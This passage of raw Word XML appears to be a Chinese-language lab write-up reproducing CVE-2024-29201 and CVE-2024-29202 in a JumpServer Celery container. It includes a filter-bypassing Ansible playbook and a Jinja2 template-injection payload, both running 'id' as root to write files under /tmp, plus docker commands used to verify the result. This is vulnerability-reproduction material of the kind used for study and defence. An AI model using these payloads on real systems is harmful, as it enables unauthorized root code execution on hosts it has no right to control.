          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lhz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E52DF63" w14:textId="060BC7C7" w:rsidR="004F44F4" w:rsidRDefault="004F44F4" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004F44F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37950EC7" wp14:editId="5C76C883">
            <wp:extent cx="5274310" cy="1867535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1637512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1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3E17" w14:textId="77777777" w:rsidR="00BF45CE" w:rsidRPr="00BF45CE" w:rsidRDefault="00BF45CE" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后为</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lhz</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户分配资产</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F41DE" w14:textId="1EF5F4FE" w:rsidR="00BF45CE" w:rsidRDefault="00BF45CE" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这样我们的环境就搭建好了，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lhz</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户都有</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF45CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产，符合漏洞条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C10FA4" w14:textId="1789E168" w:rsidR="003C2AF6" w:rsidRPr="00AA2ACE" w:rsidRDefault="00AA2ACE" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2ACE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2024-29201</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D5EC4" w14:textId="055AA355" w:rsidR="00E46D64" w:rsidRDefault="003C2AF6" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003C2AF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们首先切换账号，登陆</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lhz</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户，进入作业中心</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AF6">
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模版管理，新建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>playbook_lhz</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2AF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，进入其工作空间，加入以下的代码内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A495FE4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[{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0602E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"name": "RCE playbook",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6A0F3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"hosts": "all",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067954C3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"tasks": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B55F14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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D82D9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"name": "this runs in Celery container",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561669F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"shell": "id &gt; /tmp/pwnd",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AAA68C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"\u0064elegate_to": "localhost"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C418F5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} ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE4F83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"vars": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D2CA2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"ansible_\u0063onnection": "local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE606BC" w14:textId="7777777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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA147A6" w14:textId="18D0B847" w:rsidR="007F167F" w:rsidRDefault="007F167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}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36362A44" w14:textId="6F54D2FA" w:rsidR="00667AD1" w:rsidRDefault="00667AD1" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00667AD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F8E95A6" wp14:editId="50AA488A">
            <wp:extent cx="5274310" cy="2068830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="2115897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76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F65" w14:textId="77777777" w:rsidR="00767CC1" w:rsidRPr="00767CC1" w:rsidRDefault="00767CC1" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00767CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后点击保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1959D388" w14:textId="0308C172" w:rsidR="00767CC1" w:rsidRDefault="00767CC1" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00767CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换到作业管理页面，创建一个新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00767CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Playbook</w:t>
      </w:r>
      <w:r w:rsidRPr="00767CC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业，按照如下格式创建：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0786F31F" w14:textId="0FE721DD" w:rsidR="00635F9F" w:rsidRDefault="00635F9F" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00635F9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C85C3A8" wp14:editId="4BD0EC7E">
            <wp:extent cx="5274310" cy="2708910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1985873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8737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32A1" w14:textId="4C6DE852" w:rsidR="00A22D1A" w:rsidRDefault="00A22D1A" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A22D1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击保存，运行作业</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264DA395" w14:textId="56392F1E" w:rsidR="002C13DA" w:rsidRDefault="002C13DA" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C13DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48B37756" wp14:editId="689AC68D">
            <wp:extent cx="5274310" cy="2774950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="16548613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613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BB80" w14:textId="77777777" w:rsidR="009E17D1" w:rsidRPr="009E17D1" w:rsidRDefault="009E17D1" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AC6F6" w14:textId="227BECA8" w:rsidR="009E17D1" w:rsidRDefault="009E17D1" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们在</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中进入</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Celery</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器，查看</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下，是否存在</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwnd</w:t>
      </w:r>
      <w:r w:rsidRPr="009E17D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE64B15" w14:textId="4BA9908E" w:rsidR="00893233" w:rsidRDefault="00893233" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00893233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先切换权限，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00893233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker ps -a </w:t>
      </w:r>
      <w:r w:rsidRPr="00893233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2873F244" w14:textId="1A67B27A" w:rsidR="00893233" w:rsidRDefault="00893233" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00893233">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39F155B6" wp14:editId="4474C2E4">
            <wp:extent cx="5274310" cy="1718945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2847532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32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C6A1B" w14:textId="77777777" w:rsidR="00463752" w:rsidRPr="00463752" w:rsidRDefault="00463752" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00463752">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现其中存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00463752">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jms_celery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0B8C5" w14:textId="0003BF90" w:rsidR="00463752" w:rsidRDefault="00463752" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00463752">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>我们使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00463752">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo docker exec -it jms_celery "/bin/sh" </w:t>
      </w:r>
      <w:r w:rsidRPr="00463752">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B0F2A" w14:textId="64EDBDB1" w:rsidR="00935819" w:rsidRDefault="00935819" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00935819">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F4B77D3" wp14:editId="495916E7">
            <wp:extent cx="5274310" cy="441325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1620089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892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0B53" w14:textId="7E5846BF" w:rsidR="00BE6AB3" w:rsidRDefault="00BE6AB3" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE6AB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6AB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6AB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518DE35D" w14:textId="2EB381CF" w:rsidR="007A2CFF" w:rsidRDefault="007A2CFF" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A2CFF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0A0F63" wp14:editId="37DC6703">
            <wp:extent cx="5274310" cy="426720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="178256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65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B8BD" w14:textId="77777777" w:rsidR="0021666F" w:rsidRDefault="0021666F" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwnd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A145A19" w14:textId="1AF2AECC" w:rsidR="0021666F" w:rsidRDefault="0021666F" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们继续打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwnd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7545A914" w14:textId="785610D6" w:rsidR="00064CFB" w:rsidRDefault="00064CFB" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00064CFB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A51B962" wp14:editId="1C8F0A6F">
            <wp:extent cx="3689405" cy="716915"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="437483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831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297" cy="71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E143" w14:textId="77777777" w:rsidR="00D27F35" w:rsidRPr="00D27F35" w:rsidRDefault="00D27F35" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D27F35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27F35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwnd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27F35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中读取到了内容：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27F35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27F35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156312D0" w14:textId="1EC93350" w:rsidR="00D27F35" w:rsidRDefault="00D27F35" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D27F35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以说明我们的漏洞复现成功！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78BBCB" w14:textId="77777777" w:rsidR="00D27F35" w:rsidRPr="00767CC1" w:rsidRDefault="00D27F35" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2589BD" w14:textId="0671D8C2" w:rsidR="00E46D64" w:rsidRPr="00AA2ACE" w:rsidRDefault="00E46D64" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2ACE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2024-2920</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D5C967" w14:textId="77777777" w:rsidR="003F4A3C" w:rsidRDefault="003F4A3C" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们继续复现第二个漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C3B86" w14:textId="77777777" w:rsidR="003F4A3C" w:rsidRDefault="003F4A3C" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们修改作业中心的模板管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3E0033" w14:textId="4BB2A614" w:rsidR="003F4A3C" w:rsidRDefault="003F4A3C" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在工作空间中写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E92589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>- name: |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951F018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{% for x in ().__class__.__base__.__subclasses__() %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774997D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{% if "warning" in x.__name__ %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F314944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  {{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4B562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    x()._module.__builtins__["__import__"]("os").system("id &gt; /tmp/pwnd2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F37DC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  }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634EC2CB" w14:textId="77777777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  {%endif%}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55253002" w14:textId="44BC4F68" w:rsidR="000F151F" w:rsidRDefault="000F151F" w:rsidP="00854B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</w:pPr>
      <w:r>
        <w:t xml:space="preserve">       {%endfor%}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D731A" w14:textId="008AA9C2" w:rsidR="003D1E87" w:rsidRDefault="003D1E87" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D1E87">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B26D0D6" wp14:editId="5FFE4CA9">
            <wp:extent cx="5274310" cy="2223770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="981854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548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DCBD" w14:textId="77777777" w:rsidR="007C12D5" w:rsidRPr="007C12D5" w:rsidRDefault="007C12D5" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007C12D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们保存，运行即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C16F82" w14:textId="35908369" w:rsidR="00710C76" w:rsidRDefault="00710C76" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00710C76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80E74D" wp14:editId="5FE1721A">
            <wp:extent cx="5274310" cy="2354580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1591540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40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9CE" w14:textId="0718ECCF" w:rsidR="00420EC4" w:rsidRDefault="00420EC4" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00420EC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行得到结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D29EA" w14:textId="7FF61871" w:rsidR="00BE3C25" w:rsidRDefault="00BE3C25" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE3C25">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507FB1CD" wp14:editId="3BC79372">
            <wp:extent cx="5274310" cy="2734945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1235263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639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2F0DC" w14:textId="419EA83A" w:rsidR="00224924" w:rsidRDefault="00224924" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00224924">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们继续查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00224924">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>celery</w:t>
      </w:r>
      <w:r w:rsidRPr="00224924">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器中的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A323CD" w14:textId="66F50972" w:rsidR="001C260D" w:rsidRDefault="001C260D" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001C260D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14862419" wp14:editId="7058517A">
            <wp:extent cx="5274310" cy="439420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1061365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651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849E" w14:textId="77777777" w:rsidR="004A2DAF" w:rsidRPr="004A2DAF" w:rsidRDefault="004A2DAF" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004A2DAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发现多了一个新的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwnd2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD86CD5" w14:textId="050951CF" w:rsidR="004A2DAF" w:rsidRDefault="004A2DAF" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004A2DAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们打开，发现成功插入了内容</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2DAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB4488A" w14:textId="10F386B6" w:rsidR="00142989" w:rsidRDefault="00142989" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00142989">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F080E2" wp14:editId="6C691DC1">
            <wp:extent cx="5274310" cy="858520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1483739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39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B48" w14:textId="52BA26B3" w:rsidR="00142989" w:rsidRPr="00142989" w:rsidRDefault="00142989" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
